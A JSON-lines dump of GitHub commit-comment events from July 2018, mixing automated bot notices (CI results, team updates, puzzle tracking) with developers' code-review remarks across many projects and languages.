{"id":"7939082763","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-potion-feedstock"},"payload":{"comment":{"id":29645328,"position":null,"line":null,"path":null,"commit_id":"0464447b8098d8851768dd89bca48ec7ad740c0f","created_at":"2018-07-09T17:37:47Z","updated_at":"2018-07-09T17:37:47Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:37:47Z"}
{"id":"7939082789","type":"CommitCommentEvent","actor":{"login":"MaboUhha"},"repo":{"name":"tphsmp/theUndead"},"payload":{"comment":{"id":29645329,"position":13,"line":13,"path":"Program.cs","commit_id":"0db3707bb3ae71c542cadd494d9d4981018461b4","created_at":"2018-07-09T17:37:47Z","updated_at":"2018-07-09T17:37:47Z","author_association":"NONE","body":"тебе нужно было создать 7 классов потомков от Undead. В каждом есть реализация абстрактного метода Scream. У тебя же Scream свойство. То есть это задача на полиморфизм и наследование."}},"created_at":"2018-07-09T17:37:47Z"}
{"id":"7939087355","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/joommf-feedstock"},"payload":{"comment":{"id":29645333,"position":null,"line":null,"path":null,"commit_id":"64fa419aa4fad7f5814c72eefbe576c9c2b23616","created_at":"2018-07-09T17:38:45Z","updated_at":"2018-07-09T17:38:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @fangohr, @takluyver, @davidcortesortuno, @rpep, @marijanbeg were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:38:45Z"}
{"id":"7939089490","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29645337,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T17:39:12Z","updated_at":"2018-07-09T17:39:12Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-09T17:39:12Z"}
{"id":"7939089717","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":29645338,"position":null,"line":null,"path":null,"commit_id":"2116d54b383748996ab7bf3b8cc0e8884f014045","created_at":"2018-07-09T17:39:15Z","updated_at":"2018-07-09T17:39:15Z","author_association":"CONTRIBUTOR","body":"Binary dependency in repo? Why it is not fetched? \r\n\r\nWhy executor needs extra class path - that's complicates lot of deployments..."}},"created_at":"2018-07-09T17:39:15Z"}
{"id":"7939096466","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29645354,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T17:40:38Z","updated_at":"2018-07-09T17:40:38Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T17:40:38Z"}
{"id":"7939096743","type":"CommitCommentEvent","actor":{"login":"LiquidOfficeQuality"},"repo":{"name":"LiquidOffice/liquid-feng-unit-tests"},"payload":{"comment":{"id":29645355,"position":null,"line":null,"path":null,"commit_id":"fd1907fcfbf2c0bc9056b03c474a9f93b125fbfc","created_at":"2018-07-09T17:40:41Z","updated_at":"2018-07-09T17:40:41Z","author_association":"COLLABORATOR","body":"sppoky this is"}},"created_at":"2018-07-09T17:40:41Z"}
{"id":"7939097759","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29645357,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T17:40:54Z","updated_at":"2018-07-09T17:40:54Z","author_association":"CONTRIBUTOR","body":"Yep it's for a multithreaded approach. Your approach sounds good, it's likely going to end up being very similar to that. I know there's a 'work stealing' approach to task schedulers which I need to investigate, and see what exactly are the advantages.\r\n\r\nAlthough my main problem with reference counting was that external code was also allowed to reference a task and ideally I wanted ownership to be handled by the task scheduler. Primarily because tasks created by task groups aren't seen externally nor should even require reference counting. Yet I also wanted to change as little of task scheduler logic in fear of new threading issues, so I don't want to add a separate 'lightweight' task type."}},"created_at":"2018-07-09T17:40:54Z"}
{"id":"7939100068","type":"CommitCommentEvent","actor":{"login":"rave991"},"repo":{"name":"ampproject/amphtml"},"payload":{"comment":{"id":29645359,"position":null,"line":null,"path":null,"commit_id":"ad762bdd97152fdb17a424bf41b31eb3126dbba1","created_at":"2018-07-09T17:41:23Z","updated_at":"2018-07-09T17:41:23Z","author_association":"NONE","body":"Update"}},"created_at":"2018-07-09T17:41:23Z"}
{"id":"7939105458","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29645369,"position":15,"line":736,"path":"src/test/java/com/google/devtools/build/android/AarGeneratorActionTest.java","commit_id":"f0f5d101ddac1bce16b49fce828e85096c24bbfd","created_at":"2018-07-09T17:42:28Z","updated_at":"2018-07-09T17:42:28Z","author_association":"CONTRIBUTOR","body":"I wonder if one also needs to close this particular `BufferedReader`. 🤔"}},"created_at":"2018-07-09T17:42:28Z"}
{"id":"7939107129","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29645371,"position":null,"line":null,"path":null,"commit_id":"dfa80a89eec6bad5aee08569ad486aa68cda7d85","created_at":"2018-07-09T17:42:48Z","updated_at":"2018-07-09T17:42:48Z","author_association":"NONE","body":"Puzzle `208-edc51acf` disappeared from [`src/main/java/org/llorllale/youtrack/api/XmlIssue.java`](https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/XmlIssue.java), that's why I closed #216. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-09T17:42:48Z"}
{"id":"7939107575","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29645373,"position":null,"line":null,"path":null,"commit_id":"dfa80a89eec6bad5aee08569ad486aa68cda7d85","created_at":"2018-07-09T17:42:54Z","updated_at":"2018-07-09T17:42:54Z","author_association":"NONE","body":"Puzzle `216-3cbd571f` discovered in   [`src/main/java/org/llorllale/youtrack/api/DefaultClient.java`](  https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultClient.java)   and submitted as #222. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T17:42:54Z"}
{"id":"7939107807","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29645376,"position":37,"line":37,"path":".travis.yml","commit_id":"318f5c3c341c2e73a1d02e75bb80b5e3cc3b0698","created_at":"2018-07-09T17:42:57Z","updated_at":"2018-07-09T17:42:57Z","author_association":"NONE","body":" \t+8.9.4\r\n.travis.yml\r\n\t\t@@ -0,0 +1,37 @@\r\n\t\t+language: node_js\r\n\t\t+addons:\r\n\t\t+  firefox: \"58.0\"\r\n\t\t+env:\r\n\t\t+  global:\r\n\t\t+    - GOLANG_VERSION=1.9\r\n\t\t+    - GOPATH=$HOME/gopath\r\n\t\t+    - REPO_ROOT=$GOPATH/src\r\n\t\t+    - PATH=$PATH:/$HOME/bin:$GOPATH/bin\r\n\t\t+\r\n\t\t+before_install:\r\n\t\t+  - ./interfacer/contrib/setup_go.sh\r\n\t\t+  - cd $REPO_ROOT/webext\r\n\t\t+install:\r\n\t\t+  - npm run get-gobindata\r\n\t\t+  - npm install\r\n\t\t+  - npm run build\r\n\t\t+script:\r\n\t\t+  - npm test\r\n\t\t+after_failure:\r\n\t\t+  - cat $REPO_ROOT/interfacer/debug.log\r\n\t\t+  - cat $REPO_ROOT/interfacer/spec.log\r\n\t\t+deploy:\r\n\t\t+  - provider: releases\r\n\t\t+    api_key:\r\n\t\t+      secure: <your key>\r\n\t\t+    file:\r\n\t\t+      - linux\r\n\t\t+      - linux.sha\r\n\t\t+      - os\r\n\t\t+      - os.sha\r\n\t\t+      - windows\r\n\t\t+      - windows.sha\r\n\t\t+    skip_cleanup: true\r\n\t\t+    on:\r\n\t\t+     tags: true\r\n\t\t+"}},"created_at":"2018-07-09T17:42:57Z"}
{"id":"7939107849","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29645377,"position":null,"line":null,"path":null,"commit_id":"dfa80a89eec6bad5aee08569ad486aa68cda7d85","created_at":"2018-07-09T17:42:57Z","updated_at":"2018-07-09T17:42:57Z","author_association":"NONE","body":"Puzzle `216-2d921078` discovered in   [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](  https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java)   and submitted as #223. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T17:42:57Z"}
{"id":"7939111122","type":"CommitCommentEvent","actor":{"login":"BenTheElder"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29645381,"position":10,"line":11,"path":"prow/plugins.yaml","commit_id":"2c80848bfd7f52ccece2fa7931d1447bc69985c5","created_at":"2018-07-09T17:43:38Z","updated_at":"2018-07-09T17:43:38Z","author_association":"MEMBER","body":"this bumped kubernetes off the trusted org list for these repos, is that intentional? kubernetes-sigs has only the steering committee as members I think"}},"created_at":"2018-07-09T17:43:38Z"}
{"id":"7939114066","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29645388,"position":47,"line":24,"path":"README.md","commit_id":"318f5c3c341c2e73a1d02e75bb80b5e3cc3b0698","created_at":"2018-07-09T17:44:13Z","updated_at":"2018-07-09T17:44:13Z","author_association":"NONE","body":" \t+I'm travelling around the world and sometimes I don't have very good\r\n\t\t+Internet. If all I have is a 3kbps connection tethered from my phone\r\n\t\t+then it's good to SSH into my server and browse the web through\r\n\t\t+[elinks](http://www.xteddy.org/elinks/). That way my _server_ downloads\r\n\t\t+the web pages and uses the limited bandwidth of my SSH connection to\r\n\t\t+display the result. But it lacks JS support and all that other modern\r\n\t\t+HTML5 goodness. Browsh is simply a way to have the power of a remote\r\n\t\t+server running a desktop, but interfaced through the simplicity of a\r\n\t\t+terminal and very low bandwidth.\r\n\t\t+\r\n\t\t+Why not VNC? Well VNC is certainly one solution but it doesn't quite\r\n\t\t+have the same ability to deal with extremely bad Internet. Browsh can\r\n\t\t+use MoSH to further reduce the bandwidth and stability requirements\r\n\t\t+of the connection. Mosh offers features like automatic reconnection\r\n\t\t+of dropped connections and diff-only screen updates. Also, other than\r\n\t\t+SSH or MoSH, Browsh doesn't require a client like VNC. But of course\r\n\t\t+another big reason for Browsh is that it's just very cool geekery."}},"created_at":"2018-07-09T17:44:13Z"}
{"id":"7939121479","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29645409,"position":75,"line":56,"path":"README.md","commit_id":"318f5c3c341c2e73a1d02e75bb80b5e3cc3b0698","created_at":"2018-07-09T17:45:43Z","updated_at":"2018-07-09T17:45:43Z","author_association":"NONE","body":" \t-mosh user@yourserver:7777\r\n\t\t-./run.sh"}},"created_at":"2018-07-09T17:45:43Z"}
{"id":"7939125638","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645423,"position":29,"line":25,"path":"my_game.rb","commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T17:46:32Z","updated_at":"2018-07-09T17:46:32Z","author_association":"NONE","body":"достаточно локальной переменной"}},"created_at":"2018-07-09T17:46:32Z"}
{"id":"7939126433","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29645425,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T17:46:42Z","updated_at":"2018-07-09T17:46:42Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T17:46:42Z"}
{"id":"7939128989","type":"CommitCommentEvent","actor":{"login":"arnobaer"},"repo":{"name":"arnobaer/hls4gtl-fork"},"payload":{"comment":{"id":29645427,"position":null,"line":null,"path":null,"commit_id":"59feb42cea1f8af25736f1dee9fbb0f74f572015","created_at":"2018-07-09T17:47:13Z","updated_at":"2018-07-09T17:47:13Z","author_association":"OWNER","body":"Note that `int` and `char` are signed types! Type `size_t` is a good general purpose type for natural quantities of all kind (alias of `unsigned int`) also used by STL. If size matters `uint8_t` from `<cstdint>` might be an alternative for `unsigned char`."}},"created_at":"2018-07-09T17:47:13Z"}
{"id":"7939131068","type":"CommitCommentEvent","actor":{"login":"fejta"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29645434,"position":10,"line":11,"path":"prow/plugins.yaml","commit_id":"2c80848bfd7f52ccece2fa7931d1447bc69985c5","created_at":"2018-07-09T17:47:37Z","updated_at":"2018-07-09T17:47:37Z","author_association":"CONTRIBUTOR","body":"No, mistake"}},"created_at":"2018-07-09T17:47:37Z"}
{"id":"7939134826","type":"CommitCommentEvent","actor":{"login":"arnobaer"},"repo":{"name":"arnobaer/hls4gtl-fork"},"payload":{"comment":{"id":29645438,"position":null,"line":null,"path":null,"commit_id":"59feb42cea1f8af25736f1dee9fbb0f74f572015","created_at":"2018-07-09T17:48:23Z","updated_at":"2018-07-09T17:48:23Z","author_association":"OWNER","body":"Renaming the variables to upper case will help to recognize them as global constants in other source files."}},"created_at":"2018-07-09T17:48:23Z"}
{"id":"7939135686","type":"CommitCommentEvent","actor":{"login":"Kandid08"},"repo":{"name":"Kandid08/demo_day1"},"payload":{"comment":{"id":29645440,"position":null,"line":null,"path":null,"commit_id":"efe5484d43670214eac5855011b00c6ec5e5adb8","created_at":"2018-07-09T17:48:33Z","updated_at":"2018-07-09T17:48:33Z","author_association":"OWNER","body":"My First Edit"}},"created_at":"2018-07-09T17:48:33Z"}
{"id":"7939140324","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29645443,"position":null,"line":null,"path":null,"commit_id":"79d0801f5f21875df979ff75f84009989b62cc86","created_at":"2018-07-09T17:49:28Z","updated_at":"2018-07-09T17:49:28Z","author_association":"COLLABORATOR","body":"Forgot to say: I also made a \"Develop\" branch. We should push anything we all use to this branch, I imagine, since we all need certain things, i.e. code that opens plotly in CyBrowser and accesses information from columns named by the user. We can discuss this at some point, but in the future we might wind up making different develop branches for each function, then merging them to the master branch later on(?)."}},"created_at":"2018-07-09T17:49:28Z"}
{"id":"7939147063","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29645453,"position":28,"line":69,"path":"src/main/java/com/google/devtools/build/lib/exec/FilesetManifest.java","commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-09T17:50:47Z","updated_at":"2018-07-09T17:50:47Z","author_association":"CONTRIBUTOR","body":"Hmm, I could be wrong about this, but I believe that `ByteSource`s automatically close their underlying input streams when one calls any of its input-stream-reading methods, except `open[Buffered]InputStream`. So it's unclear to me why creating a new `ByteSource` anon sublass here and everywhere else in this commit is necessary. Am I missing something here? 🤔"}},"created_at":"2018-07-09T17:50:47Z"}
{"id":"7939148278","type":"CommitCommentEvent","actor":{"login":"dsakagi"},"repo":{"name":"jeffesp/dragonpandaclient-js"},"payload":{"comment":{"id":29645457,"position":35,"line":35,"path":"src/StatusCheck.ts","commit_id":"e4133dc081ffeb105dfed8289d86a2881fc7e224","created_at":"2018-07-09T17:51:01Z","updated_at":"2018-07-09T17:51:01Z","author_association":"NONE","body":"the *checking* of the status could succeed (200) while the *operation* could have failed\r\nand as written, this will loop until timeout in that case (edited)\r\nreference: https://github.com/datarobot/public_api_client/blob/master/datarobot/async.py#L35-L58"}},"created_at":"2018-07-09T17:51:01Z"}
{"id":"7939149494","type":"CommitCommentEvent","actor":{"login":"natekaravadhoot"},"repo":{"name":"natekaravadhoot/hello-world"},"payload":{"comment":{"id":29645458,"position":null,"line":null,"path":null,"commit_id":"cdf84d169f1a8527981570e4228dfaab2a3615fa","created_at":"2018-07-09T17:51:16Z","updated_at":"2018-07-09T17:51:16Z","author_association":"OWNER","body":"Adding json"}},"created_at":"2018-07-09T17:51:16Z"}
{"id":"7939149854","type":"CommitCommentEvent","actor":{"login":"emmahodcroft"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29645459,"position":null,"line":null,"path":null,"commit_id":"2e566c6bd62857e4189fe355482965dd67397601","created_at":"2018-07-09T17:51:20Z","updated_at":"2018-07-09T17:51:20Z","author_association":"CONTRIBUTOR","body":"Embarrassingly I think I managed to delete a line while trying to get rid of some white space. (Just changed editors and keep using the wrong shortcuts...)\r\nI think\r\n`strip_pos = [int(line.strip()) for line in ifile]`\r\nshould be in between lines 191 and 192. \r\n\r\nI've left my work computer in Ashworth so can't check/fix until tomorrow. If it causes problems for anyone before then, try the above. Sorry again! :flushed:"}},"created_at":"2018-07-09T17:51:20Z"}
{"id":"7939152331","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645462,"position":null,"line":null,"path":null,"commit_id":"363cb07cbc952e154f65173c9eb5455e4107dc41","created_at":"2018-07-09T17:51:51Z","updated_at":"2018-07-09T17:51:51Z","author_association":"COLLABORATOR","body":"@halonazhao you should check the manual version.  Unfortunately the manual and the stable are not as consistent with one another as we previously believed.  As an example, the symbol q is used in the case study version of SWHS (https://github.com/smiths/swhs/tree/master/docs/SRS).  Newton's law of cooling is defined as q = h Delta T.  (It is written as q(t), but that is because the scalar q changes with time.)"}},"created_at":"2018-07-09T17:51:51Z"}
{"id":"7939152432","type":"CommitCommentEvent","actor":{"login":"gayhub-com"},"repo":{"name":"mickey7q7/bilibili_adjustPlayer"},"payload":{"comment":{"id":29645465,"position":null,"line":null,"path":null,"commit_id":"9376eefac82036bd91314a36e54365463d4a2c87","created_at":"2018-07-09T17:51:52Z","updated_at":"2018-07-09T17:51:52Z","author_association":"NONE","body":"原来是脚本的问题啊,我还以为自己家里网有问题呢"}},"created_at":"2018-07-09T17:51:52Z"}
{"id":"7939154662","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29645471,"position":null,"line":null,"path":null,"commit_id":"c6f1c8bf1fcf0edf1e07d3db32391e7875b861d3","created_at":"2018-07-09T17:52:19Z","updated_at":"2018-07-09T17:52:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-307](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-307).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-307-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T17:52:19Z"}
{"id":"7939156158","type":"CommitCommentEvent","actor":{"login":"CoenSchalkwijk"},"repo":{"name":"Ultimaker/libCharon"},"payload":{"comment":{"id":29645474,"position":null,"line":null,"path":null,"commit_id":"683aa9907471b0f65e2e7b1d012aca9abecf8820","created_at":"2018-07-09T17:52:38Z","updated_at":"2018-07-09T17:52:38Z","author_association":"NONE","body":"Do _NOT_ remove branch. This has been sidetracked, code required for reference. Will check current status."}},"created_at":"2018-07-09T17:52:38Z"}
{"id":"7939156193","type":"CommitCommentEvent","actor":{"login":"thomcc"},"repo":{"name":"ncalexan/application-services"},"payload":{"comment":{"id":29645475,"position":null,"line":null,"path":null,"commit_id":"fce4e23222e00c41bc11f141e2b7fcf679b05a2d","created_at":"2018-07-09T17:52:39Z","updated_at":"2018-07-09T17:52:39Z","author_association":"NONE","body":"This trait was intentionally not generic. Making it generic like this prevents us from e.g. putting all the stores in an Vec we loop over to synchronize, unless they have the same error type, which is something we're likely to want to do if we have multiple stores."}},"created_at":"2018-07-09T17:52:39Z"}
{"id":"7939158308","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645478,"position":null,"line":null,"path":null,"commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T17:53:06Z","updated_at":"2018-07-09T17:53:06Z","author_association":"NONE","body":"запустил\r\n```\r\n$ ruby main.rb \r\nEnter name: \r\nMu\r\nYour cards:\r\n9♤\r\nK♥\r\nYour points: 19\r\n\r\n    Dealer cards:\r\n    1.**\r\n    2.**\r\n   \r\n\r\n    1. Skip\r\n    2. Take card\r\n    3. Open cards\r\n    \r\n2\r\nYour cards:\r\n9♤\r\nK♥\r\nA♤\r\nYour points: 20\r\nDealer cards:\r\n8♦\r\nJ♦\r\n6♥\r\nDealer points: 24\r\nYou win\r\n\r\n    1. Skip\r\n    2. Take card\r\n    3. Open cards\r\n    \r\n2\r\nTraceback (most recent call last):\r\n\t5: from main.rb:12:in `<main>'\r\n\t4: from .../my_game.rb:11:in `run'\r\n\t3: from .../round.rb:17:in `run'\r\n\t2: from .../round.rb:37:in `dealing'\r\n\t1: from .../round.rb:45:in `dealer_turn'\r\n.../round.rb:36:in `dealing': You can add only one card (RuntimeError)\r\n```\r\nво-первых почему-то после сообщения о победе предложили взять еще карту\r\nво-вторых при попытке взять карту прога вылетела с исключением...\r\nоба момента нужно исправлять )"}},"created_at":"2018-07-09T17:53:06Z"}
{"id":"7939160160","type":"CommitCommentEvent","actor":{"login":"jakubhava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":29645481,"position":null,"line":null,"path":null,"commit_id":"2116d54b383748996ab7bf3b8cc0e8884f014045","created_at":"2018-07-09T17:53:28Z","updated_at":"2018-07-09T17:53:28Z","author_association":"CONTRIBUTOR","body":"It's really ugly solution, however we need to make sure it precedes the spark class path because spark is using newer httpclient library which is causing this issue. I couldn't find a better solution, but suggestions are welcome. I realize that this is not a good approach, but wanted to unblock it"}},"created_at":"2018-07-09T17:53:28Z"}
{"id":"7939160167","type":"CommitCommentEvent","actor":{"login":"jeffesp"},"repo":{"name":"jeffesp/dragonpandaclient-js"},"payload":{"comment":{"id":29645482,"position":7,"line":7,"path":"tests/boot.test.ts","commit_id":"e4133dc081ffeb105dfed8289d86a2881fc7e224","created_at":"2018-07-09T17:53:28Z","updated_at":"2018-07-09T17:53:28Z","author_association":"OWNER","body":"This will be added in soon."}},"created_at":"2018-07-09T17:53:28Z"}
{"id":"7939166522","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29645492,"position":null,"line":null,"path":null,"commit_id":"84582e5ae5dd8db8991682e0b8d09f2003bde7a1","created_at":"2018-07-09T17:54:42Z","updated_at":"2018-07-09T17:54:42Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4425)*\n"}},"created_at":"2018-07-09T17:54:42Z"}
{"id":"7939167016","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29645493,"position":null,"line":null,"path":null,"commit_id":"b13879e619333525026d48364610456e10b1d67f","created_at":"2018-07-09T17:54:48Z","updated_at":"2018-07-09T17:54:48Z","author_association":"COLLABORATOR","body":"@raphaelbadia Most likely of this or even of the encoding."}},"created_at":"2018-07-09T17:54:48Z"}
{"id":"7939169389","type":"CommitCommentEvent","actor":{"login":"Mitz383"},"repo":{"name":"LaunchCodeEducation/helloworld-solutions"},"payload":{"comment":{"id":29645496,"position":5,"line":5,"path":"chapter4/README.md","commit_id":"c6e4a71c82b77df27e76047c20a0555884f97a7e","created_at":"2018-07-09T17:55:17Z","updated_at":"2018-07-09T17:55:17Z","author_association":"NONE","body":"Here was my solution for problem number 3 Classic Interview Problem:\r\n\r\nnumbers = range(1,21)\r\n\r\nfor number in numbers:\r\n    if number %3 ==0:\r\n        print(\"Hip\")\r\n    if number %7 == 0:\r\n        print(\"Hooray\")\r\n\r\nFor some reason when I  tryp the other solution posted all that prints is  20:."}},"created_at":"2018-07-09T17:55:17Z"}
{"id":"7939174376","type":"CommitCommentEvent","actor":{"login":"dan-snelson"},"repo":{"name":"autopkg/novaksam-recipes"},"payload":{"comment":{"id":29645503,"position":null,"line":null,"path":null,"commit_id":"3bcc6eff9a85f9c7ff0fcb357281a92f248b8a6b","created_at":"2018-07-09T17:56:19Z","updated_at":"2018-07-09T17:56:19Z","author_association":"NONE","body":"Thanks, @novaksam!"}},"created_at":"2018-07-09T17:56:19Z"}
{"id":"7939177929","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645505,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T17:57:04Z","updated_at":"2018-07-09T17:57:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T17:57:04Z"}
